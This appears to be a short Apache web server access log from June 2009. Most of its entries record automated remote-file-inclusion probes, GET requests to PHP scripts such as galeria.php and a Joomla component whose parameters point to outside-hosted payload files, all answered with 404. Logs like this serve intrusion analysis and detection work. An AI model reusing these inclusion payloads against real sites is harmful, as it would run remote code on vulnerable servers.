218.249.36.194 - - [12/Jun/2009:03:22:52 -0400] "GET //galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jun/2009:03:22:53 -0400] "GET /logs//galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
66.249.71.54 - - [12/Jun/2009:03:22:55 -0400] "GET /images/logo_12.gif HTTP/1.1" 200 676 "-" "Googlebot-Image/1.0"
116.121.201.70 - - [12/Jun/2009:03:23:00 -0400] "GET /logs/access_log.Q109053100/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.210.89.18 - - [12/Jun/2009:03:23:22 -0400] "GET /logs/error_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
